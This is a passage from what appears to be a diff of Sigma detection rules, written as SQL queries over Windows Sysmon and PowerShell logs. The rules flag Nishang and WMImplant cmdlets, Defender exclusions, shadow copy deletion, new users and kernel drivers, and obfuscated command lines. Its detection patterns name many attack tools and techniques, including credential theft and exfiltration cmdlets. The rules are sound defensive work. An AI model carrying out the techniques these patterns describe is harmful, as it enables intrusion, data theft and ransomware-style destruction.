'\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.006" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.t1003" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Diagnostics" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Administrative scripts that use the same keywords." + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Suspicious Get Information for SMB Share", - "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "status": "test", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_smb_share_reco.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "Suspicious Process Discovery With Get-Process", - "id": "af4c87ce-bdda-4215-b998-15220772e993", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Get the processes that are running on the local computer.", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.discovery", - "attack.t1057" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_process.yml" - }, - { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + }, + { + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "status": "experimental", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Rare legitimate installation of kernel drivers via sc.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText 